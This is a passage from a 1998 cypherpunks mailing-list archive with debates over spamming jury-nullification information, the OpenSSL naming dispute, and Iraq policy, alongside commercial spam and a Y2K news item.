unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------


On Fri, 25 Dec 1998, Anonymous wrote:

:Date: Fri, 25 Dec 1998 04:47:41 +0100
:From: Anonymous <nobody@replay.com>
:To: cypherpunks@toad.com
:Subject: spamactivism
:
:
:At 05:07 PM 12/24/98 +0100, Anonymous wrote:
:>I think about putting up about $200 or so (whetever a decent spamming 
:>will cost me) and spam the internet with the information about jurors
:>rights and jury nullification.
:>
:>Anyone thinks that it is a good idea?
:
:Education can only be for the good.
:
:Got an anonymous ecash account of some sort?  In either case, kudos.
:
:
:
:
:
:
:
:
:  
:
:
:
:
:




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Jagielski <jim@jaguNET.com>
Date: Sat, 26 Dec 1998 01:35:54 +0800
To: apache-ssl@lists.aldigital.co.uk
Subject: Re: [apache-ssl] Re: Sammers    eers Theft  of Ben lauries Intellectual
In-Reply-To: <19981225051204.19697.qmail@hotmail.com>
Message-ID: <199812251712.MAA11829@devsys.jaguNET.com>
MIME-Version: 1.0
Content-Type: text



jim finder wrote:
> 
> 
> All I've seen so far is Ben and Sameer throwing shit at
> each other, egged on by anonymous flamers, without anymone
> bothering to provider enough information for an outsider to
> decide how much of it should stick. Right now, all I can
> conclude is that there is plenty of shit to go around.
> 

As in any "campaign", it appears that mud and shit are the first things
to get flung.

I'm familiar with some background and some of the issues. Unfortunately,
what we are faced with is the idea that one group wants to "own" the
concept of an Open SSL project. This is certainly not the way to start
a successful, open source, group-based project.

People are pretty astute. If they feel that one project is a sham over
the other, that it simply exists to stroke some egos or make sure
that certain people's names are mentioned when SSL is discussed, then
people aren't going to contribute. 
-- 
===========================================================================
   Jim Jagielski   |||   jim@jaguNET.com   |||   http://www.jaguNET.com/
            "That's no ordinary rabbit... that's the most foul,
            cruel and bad-tempered rodent you ever laid eyes on"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Fri, 25 Dec 1998 21:34:39 +0800
To: cypherpunks@cyberpass.net
Subject: I want to spam the Jury Duty information
Message-ID: <19981225131927.24903.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



Well if you are going to go to the trouble and expense, then you
should also put something in there to educate the masses about
how to use crypto to protect themselves, and why this is a good
idea.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jack Rusher" <jar@rci.net>
Date: Sat, 26 Dec 1998 03:27:46 +0800
To: <apache-ssl@lists.aldigital.co.uk>
Subject: OpenSSL
Message-ID: <001d01be3039$2d9410a0$31a7fea9@oemcomputer>
MIME-Version: 1.0
Content-Type: text/plain



>I'm familiar with some background and some of the issues. Unfortunately,
>what we are faced with is the idea that one group wants to "own" the
>concept of an Open SSL project. This is certainly not the way to start
>a successful, open source, group-based project.


Hey, everybody, here is a novel idea:

Why don't we look at this as a great opportunity to make some really good
free software that will make all of our lives easier.  It is time for the
free SSL implementation to move into a larger (and more continously updated)
group project.  OpenSSL is a great idea, a great name for the idea, and it
is the right time to do it.  So, how about we stop looking at this as a
pissing contest between some strong personalities?  There are alot of
talented developers on this list, and I think that we would all be better
off working together than turning into a bunch of bitter, petty, ego driven
camps that are primarily concerned with proving how large their genitals
are.

What I am trying to say is, if (for instance) Ben and Ralph would like to
sit down for a pint and make nice with one another, I am buying.  Name the
pub, in the neutral country of your choice, and we are there.  ;-)

j.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lucky Green" <shamrock@netcom.com>
Date: Fri, 25 Dec 1998 21:35:37 +0800
To: <cryptography@c2.net>
Subject: RE: Sameers Theft  of Ben lauries Intellectual Property(i.e.apache
In-Reply-To: <199812250309.EAA07755@replay.com>
Message-ID: <000001be3009$9a806fe0$f3176dc2@lucky.zks.net>
MIME-Version: 1.0
Content-Type: text/plain



[Coderpunks distribution removed]
Anonymous wrote:
> For the clueless or history deficient
>
> C2 gots its start by purloining without compensation
> Ben Lauries Apache-SSL patches.... Sameer used these and then
> had the fucking gall to remove source from apache-ssl
> for the mod_ssl.c... all was rosy until Ralf releases
> a mod_ssl.c of his design... result??

I've heard a number of descriptions of the history of Apache-SSL-US (later
Stronghold) over the years, but Anon's version of history is not supported
by the facts.

First of all, Stronghold does not use a line of Ben's Apache-SSL code.
Hasn't for years. C2Net switched to the Sioux code base when they acquired
Sioux from Thawte. Which was a long time ago.

> C2's business worldwide took a nose dive...(layoffs etc)
> so now Sameer is trying to coopt Ralf's mod_ssl.c project
> (mark my words if Sameer gets his way the source for future
> verions will NOT be available no matter what he says now...)
> I seen it happen once so now when the litte sob trys it
> again I am blowing the whistle...(and retelling history openly)
> how about it Sameer are you now going to Sue the Mix network:) ?

[Out of courtesy, I won't comment on C2Net's present difficulties other than
that they have little to do with mod_ssl].

Fast forward a few years. Ralph releases mod_ssl, by all accounts a very
well done SSL integration with Apache. mod_ssl implements some much overdue
cleanups that for whatever reasons never made it into Ben's Apache-SSL. I
don't know if C2Net is moving to use mod_ssl, but given the quality of the
module, I would not be surprised. Either way, mod_ssl is under BSD-style
license and C2Net is free to use mod_ssl in their commercial products.

Meanwhile, troubles developed in SSLeay land. The entire recent discussion
about OpenSSL on the various lists must be rather confusing if one doesn't
know the current status of SSLeay. [Hint: it would be really nice if this
finally was announced by those who should be doing the announcement. Which
isn't me].

Suffice to say that it is unlikely in the extreme that SSLeay or the SSLapps
will continue to be maintained by their original development team, Eric
Young and Tim Hudson. Rather than complain about this turn of events, let's
all thank Eric and Tim for the awesome work they performed for cryptographic
freedom and the Internet community. Big thanks guys! Those that feel
inclined to complain about the situation are strongly encouraged to write an
open source software implementation of the importance, complexity, and size
of SSLeay prior to voicing their complaints.

With future SSLeay development in limbo, somebody needs to ensure continued
development. Unfortunately, the launch of such a framework was overshadowed
by Sameer and Ben slugging out their personal differences on mailing lists.
It was silly and downright rude for anyone to announce the formation of such
a group before first giving the usual suspects a courtesy heads-up. But this
too will hopefully be water under the bridge before long (just please
remember it for the next time). Meanwhile, the best of wishes for the
OpenSSL project.

[Disclaimer: I am an ex-C2Net employee]

Happy holidays,
--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Music Boulevard <kkG_UUn.4@my.musicblvd.com>
Date: Sat, 26 Dec 1998 10:18:16 +0800
To: Cypher Punks <cypherpunks@toad.com>
Subject: Announcing our Store Wide Sale!
Message-ID: <199812260151.RAA13895@pm1.postdirect.com>
MIME-Version: 1.0
Content-Type: text/plain




Dear Cypher,

Happy Holidays!


We're excited to announce our most spectacular sale of 
the year.  It's a store wide sale and that means you'll 
save on absolutely EVERYTHING in our store!  Come choose 
from over 300,000 CDs and music merchandise, but hurry!  
This fantastic sale ends on January 8, 1998 at 5:00 PM EST.
http://p0.com/r.d?wg9yny1Tk=musicblvd/cgi-bin/tw/5226_0_main.txt

Want to get your favorite music at your fingertips...
24 hours a day?  Then sign up for My Music Boulevard, 
click here, http://my.musicblvd.com/?m=2647&u=487322

It's a customized online service where Music Boulevard 
brings you your very own personalized home page, hot New
Releases (before they're available in stores), Artist 
Spotlights, Breaking News, Gossip and Special 
Promotions...

Happy Holidays and Happy New Year!

Chris Hoerenz
Store Manager
www.musicblvd.com


POST-->
P.S.  If, for any reason, you'd prefer not to receive
future updates or announcements from Music Boulevard,
you may reply to this email and type "unsubscribe" as
the subject line of your reply.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Fri, 25 Dec 1998 17:00:58 +0800
To: cypherpunks@cyberpass.net
Subject: Re: I want to spam the Jury Duty information
In-Reply-To: <199812241607.RAA29858@replay.com>
Message-ID: <3.0.5.32.19981225183903.00af62a0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



If you wanted to be sure the remailers were full of something else while
you sent something anon and sensitive, it might make good camoflage for the
other. Besides the public service announcement.

Someone addressed reliability of remailers with the ability of watchers to
retrace a particular post and tied it to the volume of SPAM currently
traveling through the same box. In a nutshell, the more SPAM being
transmitted, the more difficult it is/would be to retrace any one
particular email. 
Is there a decent retelling of this anywhere, or has anyone found or
authored additional information on it???


At 05:07 PM 12/24/98 +0100, Anonymous wrote:
>I think about putting up about $200 or so (whetever a decent spamming 
>will cost me) and spam the internet with the information about jurors
>rights and jury nullification.
>
>Anyone thinks that it is a good idea?
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Fri, 25 Dec 1998 17:36:17 +0800
To: Missouri FreeNet Administration <measl@mfn.org>
Subject: Re: I must admit. . .
In-Reply-To: <3.0.5.32.19981224151942.0388eb40@205.83.192.13>
Message-ID: <3.0.5.32.19981225190607.00af43c0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 07:50 PM 12/24/98 -0600, Missouri FreeNet Administration wrote:
>On Thu, 24 Dec 1998, Reeza! finally got to the point of the matter:
>
><massive snip>
>:, that does not mean I'm willing to allow one
>:expansionist dictator to sanction another country and gain control of
>:enough of the worlds oil supply to impact the well-being of my country.
>
>I believe this is the the only true argument here.  The US (and you) are
>not "pleased" with the fact that the one place on the planet that has the
>worlds largest oil deposits is not beholden to the USG.  If Hussein were
>to have remained a US puppet, he could do pretty much as he damn well
>pleased, anywhere he damn well pleased - just as long as OUR oil prices
>didn't escalate.  

Lots of dictators around the world do pretty much as they please anyway.
Remember it was a world community effort to force Hussein back and restore
Kuwait, NOT something the US undertook solely upon its own.

>	Weren't the old days wonderful?  A time when the USG could force
>countries like Iraq to sell oil at or below cost?  And isn't that the
>entire point of "allowing" Iraq to sell oil at the rate of some 50 billion
>dollars every six months (IIRC)?  On the one hand, we "embargo" all food
>and medicines, for their own good of course, and on the other hand we are
>"willing" to forego that embargo, *if it benefits us*.  

The USG could force countries like Iraq to sell at or below cost? You are
forgetting OPEC, the international bankers cartel and other organizations
where the reins of power are really located. 

>	This has ZERO to do with Kuwait or weaponry, and *everything* to
>do with the US id - we want *what* we want, *when* we want it, and at the
>*price* we want it, *OR ELSE*.

But of course. by manufacturing a boogey man to blame all the evil on, no
one would ever suspect there was a 3rd party involved, now would they?

This is growing old, lets take it offlist if you want to pursue it. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rcballen@mindspring.com
Date: Sat, 26 Dec 1998 07:33:52 +0800
To: <cypherpunks@Algebra.COM>
Subject: No Subject
Message-ID: <000701be3064$2ae70a80$3a3556d1@default>
MIME-Version: 1.0
Content-Type: text/plain




GAY
 


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Fri, 25 Dec 1998 17:41:37 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Forwarded mail...
In-Reply-To: <199812250405.WAA02538@einstein.ssz.com>
Message-ID: <3.0.5.32.19981225192104.00b00100@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 10:05 PM 12/24/98 -0600, Jim Choate wrote:
>Forwarded message:
>
>> Date: Thu, 24 Dec 1998 19:50:34 -0600 (CST)
>> From: Missouri FreeNet Administration <measl@mfn.org>
>> Subject: Re: I must admit. . .
>
>> On Thu, 24 Dec 1998, Reeza! finally got to the point of the matter:
>> 
>> <massive snip>
>> :, that does not mean I'm willing to allow one
>> :expansionist dictator to sanction another country and gain control of
>> :enough of the worlds oil supply to impact the well-being of my country.
>> 
>> I believe this is the the only true argument here.  The US (and you) are
>> not "pleased" with the fact that the one place on the planet that has the
>> worlds largest oil deposits is not beholden to the USG.
>
>Actualy there are equivalent oil and gas deposits in SE Asia and Antartica.
>But they doesn't belong to the USG either.
>
>Of course the point is valid. Though it almost begs the question of why in
>such a situation there is not a more powerful search for alternatives. There
>are actualy very few technologies that care whether oil or gas is used in
>energy production or some entirely different process.
>

Which point? Yours, or J.A.'s???
I thought the point wasn't about control of that segment of the oil supply,
I was voicing my personal opinion there. Rather, the point was about the
sanction of a sovereign neighbor nation, and our (The US's) actions in
forcing Hussein back as part of a world community effort. Whether our
"sticking our noses into it" as J.A. said earlier, was justifiable. 

I agree we should be pursuing alternative energies with greater diligence,
I'd like to see what the petroleum companies have on their shelves and are
suppressing.

Reeza!
 
============================================================================
DH Key available upon request.


The affairs of Men rarely rely on the dictates of logic, or even common sense.


	"Yeah, they mostly rely on something below the belt."

				-- my older sister




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: b3177@postmark.net
Date: Sat, 26 Dec 1998 12:35:24 +0800
To: <cypherpunks@Algebra.COM>
Subject: Are You Doing This ?
Message-ID: <199812260402.WAA01297@galaxy.galstar.com>
MIME-Version: 1.0
Content-Type: text/plain





Would You Put 2 Stamps On An Envelope...
That Only Needed 1 ?

Are You Paying More Than You Have To...
For Long Distance & Phone Services ???

We Offer 1st Class Fiber-Optic Phone Services
>From Major Carriers - At Group Discount Rates !

*8.9 Cents/Min (24 Hours/Day) (Even Lower-See Below)
*Receive 30 Minutes Of F-R-E-E Calling For Signing Up 
*6 Second Billing (Saves 20% More)
*NO Sign-Up Fees
*NO Monthly Billing Fees
*NO Minimum Usage
*No Gimmicks

Toll-Free Numbers Are Also Only 8.9 Cents/Min
With 6 Second Billing & No Set-Up/Transfer Fee

Callings Cards - Just 14.9 Cents/Min 
6 Second Billing - NO " Bong " Charges 

P-L-U-S 

Get 30 Minutes Of FREE Calling For EACH Person 
That You Refer Who Signs Up For Service. Refer
3 People Who Sign Up And YOUR Rate Lowers To:
7.9 CENTS/MIN - PERMANENTLY ! 

A-N-D

EVERYONE That You Refer, Who Signs Up For Service, 
ALSO Gets 30 Minutes Of FREE Calling !

Get Your Final Cost Per Minute Down To 5 Cents/Min,
3 Cents/Min, Even Down To ZERO - With Our Referral
Program - It's Totally FREE To You & The People That
You Refer !

When We Get A Lower Rate - YOUR Rate Goes DOWN
A-U-T-O-M-A-T-I-C-A-L-L-Y. Unlike Other Carriers, Our
Prices Have NEVER Gone Up - Only Down - And They
Continue To Do So !

Call Us Today For More Info - Or To Sign Up !

1-888-333-4943

(TOLL-FREE)

Monday-Friday
10 AM - 10 PM
Eastern



P. S. 

We Receive Hundreds Of Calls Per Day. If Lines 
Are Busy - Keep Trying. This Is An Information
And Sign-Up Line.If You Sign-Up For The Service,
You Will Have The Direct Toll-Free Numbers For 
Our Customer Service & Billing Departments.
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeffrey Altman <jaltman@watsun.cc.columbia.edu>
Date: Sat, 26 Dec 1998 10:03:32 +0800
To: "Jack Rusher" <jar@rci.net>
Subject: Re: [ssl-users] OpenSSL
Message-ID: <CMM.0.90.4.914636623.jaltman@watsun.cc.columbia.edu>
MIME-Version: 1.0
Content-Type: text/plain



OpenTLS would be a much better name given the standards process in the
IETF.


    Jeffrey Altman * Sr.Software Designer * Kermit-95 for Win32 and OS/2
                 The Kermit Project * Columbia University
              612 West 115th St #716 * New York, NY * 10025
  http://www.kermit-project.org/k95.html * kermit-support@kermit-project.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Guerra <az096@freenet.toronto.on.ca>
Date: Sat, 26 Dec 1998 12:45:27 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Mixmaster client 4 the Mac OS?
In-Reply-To: <v04020a2eb28cf1258de0@[139.167.130.246]>
Message-ID: <v04103602b2aa0cbdead5@209-20-2-109.dialin.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 8:53 PM -0500 1998/12/3, Robert Hettinga wrote:


> Date: Fri, 4 Dec 1998 01:42:19 +0100
> From: Anonymous <nobody@replay.com>
> Subject: Mixmaster client 4 the Mac OS?
> To: cypherpunks@toad.com
> Sender: owner-cypherpunks@cyberpass.net
>
> I heard sometime last summer that the mixmaster client was being ported to
> the Mac. Does anyone know the status of this project?
>

Perhaps it would be an interesting project which either used the 
PGPsdk libraries, or GNUPG code...

Robert Guerra <az096@freenet.toronto.on.ca>
WWW Page <http://www.interlog.com/~rguerra/www>
PGPKeys  <http://www.geocities.com/CapitolHill/3378/pgpkeys.html>

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0.2
Comment: Digital Signatures ensure authenticity and author

iQA/AwUBNoRj2sKdCsHMpdeSEQLnUwCfbm1vskjLT5Peanetx3Kq7Wrw5I8An2D1
wo6ePDYFqU4gPyp2fWK+v9k3
=brF8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Guerra <az096@freenet.toronto.on.ca>
Date: Sat, 26 Dec 1998 12:38:06 +0800
To: Robert Hettinga <mac-crypto@vmeng.com
Subject: Re: international free crypto campaign
In-Reply-To: <v04020a44b2a002ece47e@[139.167.130.248]>
Message-ID: <v04103605b2aa0dca29fc@209-20-2-109.dialin.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi:

Please feel free to submit via my www page any "crypto campaign" 
links to my pgp & crypto links page.

It's located at :

	http://www.interlog.com/~rguerra/www

I hope that with enough links it will serve as a directory where 
groups with related interests can find each other.

regards

robert


Robert Guerra <az096@freenet.toronto.on.ca>
WWW Page <http://www.interlog.com/~rguerra/www>
PGPKeys  <http://www.geocities.com/CapitolHill/3378/pgpkeys.html>

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0.2
Comment: Digital Signatures ensure authenticity and author

iQA/AwUBNoRj+MKdCsHMpdeSEQJ+4gCgsEhoZNZKJauiYlstWeCkCwTVdTkAoPNR
HQbC3TDfSzY1DLUfZOT0QDhs
=JQAJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Sat, 26 Dec 1998 07:52:06 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: I want to spam the Jury Duty information
Message-ID: <237d9e70288755e31703fff1b66beb98@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>Well if you are going to go to the trouble and expense, then you
>should also put something in there to educate the masses about
>how to use crypto to protect themselves, and why this is a good
>idea.

And while we're being hypocritical and stealing (oh, it's okay because it's
for "education"), maybe we ought to educate about why spam is bad, and how
crypto may help end spam.

Right. About the only thing you people are going to accomplish is to
alienate anybody who might care what you have to say. While you're spamming,
maybe you can even make the Cypherpunks look really bad. Hell, go ahead and
put the list address as the "From" address. It will shut down the list, make
us look like idiots, and accomplish very little, but it's for a good cause.

After all, the ends always justify the means. When the USG wants to storm
your home with a squad of ninjas, that's okay, so long as they're checking
for drugs or other evil things. Since it will keep us all safe, let's
eliminate privacy rights.

The idea of spamming for "educational purposes" is the most obscene and
stupid I've heard on this list in a while. Both of you read "The Prince" one
too many times.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 26 Dec 1998 15:00:09 +0800
To: cypherpunks@cyberpass.net
Subject: [PNS-List] CFP: Epidemiology of Ideas
Message-ID: <v04020a6bb2aa31a76406@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Mailing-List: contact pns-list-owner@egroups.com
Reply-To: pns-list@egroups.com
Delivered-To: listsaver-egroups-PNS-List@eGroups.com
From: "Philosophy News Service List Mgr. [richard jones]"
	 <ListMgr@PhilosophyNews.com>
To: "'PNS-List@eGroups.com'" <PNS-List@egroups.com>
Date: Fri, 25 Dec 1998 22:50:49 -0500
Subject: [PNS-List] CFP: Epidemiology of Ideas

To: pns-list@egroups.com
From: Mariam Thalos <thalos@ACSU.BUFFALO.EDU>
Subject: CALL FOR PAPERS: THE EPIDEMIOLOGY OF IDEAS (fwd)
Date: Wed, 23 Dec 1998 15:49:49 -0500 (EST)


From: Barry Smith <phismith@acsu.buffalo.edu>
To: thalos@acsu.buffalo.edu, rapaport@cs.buffalo.edu
Subject: CALL FOR PAPERS: THE EPIDEMIOLOGY OF IDEAS


THE MONIST
An International Quarterly Journal of General Philosophical Inquiry
Edited by Barry Smith
http://wings.buffalo.edu/philosophy/Publications/Monet/

CALL FOR PAPERS

THE EPIDEMIOLOGY OF IDEAS


Deadline for submissions: July 2000
Advisory Editor: Dan Sperber (CREA, Paris)
mailto:sperber@poly.polytechnique.fr

Both in the psychological and in the social sciences, the notion of
representation plays a major role. But how are the psychological notion of
a mental representation and the sociological notion of a collective or
cultural representation related? While there has been a naturalistic turn
in cognitive science, proposals for the naturalization of mental
representations have had little or no impact on the social sciences. This
may be due in part to the fact that these naturalistic proposals typically
focus on the individual cognizer. Yet, a large proportion of the mental
representations of a human individual are, in fact, mere individual
versions of representations widely distributed in human groups.
	By embracing the hypothesis that populations of representations (somewhat
like populations of bacteria or viruses) are hosted by human populations,
it becomes possible to apply to the distribution and evolution of mental
representations models derived from epidemiology, population genetics, and
evolutionary theory. Cultural representations are then seen as strains of
mental representations of very similar content widely distributed across a
population. To approach cultural representations in this way is to look for
the causal explanation of macro-scale cultural phenomena in the
micro-processes of cognition and transmission. It is to engage in a kind of
epidemiology of ideas. Philosophers, biologists, and anthropologists have
developed a variety of such epidemiological or evolutionary models, with
particular application to cultural diffusion and to the history and
philosophy of science. Both philosophers and social scientists with a
serious interest in philosophy are invited to contribute papers on these
and related topics.

______________________________________
Department of Philosophy             611 Baldy Hall
University at Buffalo                          716 633 2041
Buffalo NY 14260 - 1010          fax: 716 645 6139
http://wings.buffalo.edu/philosophy/faculty/smith




------------------------------------------------------------------------
eGroup home: http://www.eGroups.com/list/pns-list
Free Web-based e-mail groups by eGroups.com

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 26 Dec 1998 10:39:52 +0800
To: cypherpunks@toad.com
Subject: jury spam justifiable?
Message-ID: <199812260214.DAA17226@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:35 AM 12/26/98 -0000, HyperReal-Anon wrote:
>And while we're being hypocritical and stealing (oh, it's okay because it's
>for "education"), maybe we ought to educate about why spam is bad, and how
>crypto may help end spam.

Its not stealing because only the Govt can identify crimes.  And they
haven't.

Legal Junk mail doesn't steal time?  Legal Solicitors' phone calls don't
steal?  Taxes don't steal?  Courtroom injustice isn't a theft of rights?

>Right. About the only thing you people are going to accomplish is to
>alienate anybody who might care what you have to say. 

The message must be phrased correctly.

>While you're spamming,
>maybe you can even make the Cypherpunks look really bad. 

Who mentioned any mailing list?  This would be a private matter.

>After all, the ends always justify the means. When the USG wants to storm
>your home with a squad of ninjas, that's okay, so long as they're checking
>for drugs or other evil things. Since it will keep us all safe, let's
>eliminate privacy rights.

Alls fair in love and war.

>The idea of spamming for "educational purposes" is the most obscene and

The sheeple who haven't figured out how to filter spam are the ones
most in need of education.  Do it for the children.  For the future
generations.

The only thing evil needs to succeed is for good to do nothing.

Or just carry on with the same old same old, if that's what makes you feel
better.  Best not to make waves, after all.  Might scare the horses.












  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pallas Anonymous Remailer <athena@cyberpass.net>
Date: Sat, 26 Dec 1998 21:12:06 +0800
To: cypherpunks@cyberpass.net
Subject: Y2K OFFICIALS CONVENE, CONFESS
Message-ID: <70b0380731c769729b7e3d31789b323d@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Attendees of a meeting convened by the United Nations confirmed that while
central banking and telecommunications systems in many countries are making
progress toward Y2K compliance, many other necessary systems still need
help.  Those include electrical power systems, global shipping systems, the
linkages between telecommunications systems, and SWIFT, a system for
exchanging financial information.  The U.N. meeting was the first time top
Y2K officials were brought together.  "One of the goals of this meeting is
to identify the senior executives who are dealing with the problem," says
the chairman of the U.S. President's Council on Year 2000 Conversion.  "We
want the delegates to go home with a knowledge of faces and with agreements
on going forward.  We don't have time to go through normal diplomatic
channels."  More than 100 officials attended the meeting.  (TechWeb 14 Dec
98)

#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Sat, 26 Dec 1998 04:14:30 +0800
To: coderpunks@toad.com
Subject: OpenSSL (whoever picks up the banner) Yeah!!
Message-ID: <be1e2d7758d84781f7016a467ef2fb5a@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



To: cypherpunks@toad.com
cc:
Subject: Open Source separate from the Crypto export battle
--------

   Happy What ever to you all !
     
 gee Anonymous... you seem to be quite angry... or
a feeble provacateurs attempt to cause division in the ranks(Infowar 
Level 1 perhaps??)
(as if there wasnt enough already...)


    I think its vitally important to recognize Sameers and C2Nets
contribution to fighting against both the US bullshit export  laws
and to good quality cryptographic software... Stronghold while NOT
open source has been a vital and much appreciated part of the battle 
against the eavesdroppers at the NSA/Interpol/GCHQ etc.

I am however somewhat guarded about how Open Source OpenSSL will remain.
For example will competitors to C2net be able to use it without
licensing or fees to C2net in some form..?

  I would also like to thank Ben Laurie for making the patches available.
A lot of sites run these worldwide.


I sincerely wish the anonymous flamers would cease and desist
you are contributing as much garbage as the average spammer to these lists

If people dont make a profit from crypto activities... then there
wont be any crypto...
   

    Again Sameer thanx for all you have done.. 
    Seasons greetings
    Anon.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lucky Green" <shamrock@netcom.com>
Date: Sat, 26 Dec 1998 13:06:53 +0800
To: <jar@rci.net>
Subject: RE: [ssl-users] OpenSSL
In-Reply-To: <CMM.0.90.4.914636623.jaltman@watsun.cc.columbia.edu>
Message-ID: <000201be308c$1c01fe80$f3176dc2@lucky.zks.net>
MIME-Version: 1.0
Content-Type: text/plain



Make that another vote for OpenTLS.

--Lucky Green <shamrock@netcom.com>
  PGP 5.x  encrypted email preferred

> -----Original Message-----
> From: owner-coderpunks@toad.com [mailto:owner-coderpunks@toad.com]On
> Behalf Of Jeffrey Altman
> Sent: Saturday, December 26, 1998 02:44
> To: Jack Rusher
> Cc: sw-mod-ssl@engelschall.com; apache-ssl@lists.aldigital.co.uk;
> cypherpunks@cyberpass.net; coderpunks@toad.com; cryptography@c2.net
> Subject: Re: [ssl-users] OpenSSL
> 
> 
> OpenTLS would be a much better name given the standards process in the
> IETF.
> 
> 
>     Jeffrey Altman * Sr.Software Designer * Kermit-95 for 
> Win32 and OS/2
>                  The Kermit Project * Columbia University
>               612 West 115th St #716 * New York, NY * 10025
>   http://www.kermit-project.org/k95.html * 
> kermit-support@kermit-project.org
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 26 Dec 1998 15:00:25 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: jury spam justifiable?
Message-ID: <199812260635.HAA02005@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>At 12:35 AM 12/26/98 -0000, HyperReal-Anon wrote:
>>And while we're being hypocritical and stealing (oh, it's okay because it's
>>for "education"), maybe we ought to educate about why spam is bad, and how
>>crypto may help end spam.
>
>Its not stealing because only the Govt can identify crimes.  And they
>haven't.

No, it's stealing. The government doesn't call the Waco incident
murder, but that doesn't make it okay. 

>Legal Junk mail doesn't steal time?  Legal Solicitors' phone calls don't
>steal?  Taxes don't steal?  Courtroom injustice isn't a theft of rights?

1) Yes, but at least the person sending it paid for it. It doesn't
consume any resources from the recipient, other than mailbox space
which the government claims it owns anyway. The postal service has to 
store and deliver it, but they got paid for it. When you get it,
you're perfectly free to cram it back in the outgoing mail slot like I
do.

2) They steal time and they're very annoying, but they don't steal
money per se. If they're long distance the caller pays for it. Most
people are annoyed by these. The anti-phone-soliciting action is to
never buy from those companies.

3) Taxes are theft at the point of a gun. You won't find much argument
about that here. There will be argument when it comes to the complete
elimination of taxes because that generally means the almost complete
elimination of services.

4) Of course it is.

Just because all four of those things are legal in one way or another
doesn't mean that we should support it. I can walk outside and insult
random people to their face, but that dosen't mean I should.

Just because you *can* do something and you have some reason to do
something doesn't mean that you *should* do it, particularly if there
are better ways.

>
>>Right. About the only thing you people are going to accomplish is to
>>alienate anybody who might care what you have to say.
>
>The message must be phrased correctly.

The phrasing has nothing to do with it. The method of delivery does.

>
>>While you're spamming,
>>maybe you can even make the Cypherpunks look really bad.
>
>Who mentioned any mailing list?  This would be a private matter.

Apparently this is beyond your comprehension, so I'll explain it in
explicit terms.

You will likely direct people to FIJA. First off, when you send the
spam FIJA and their upstream sites are going to get all sorts of
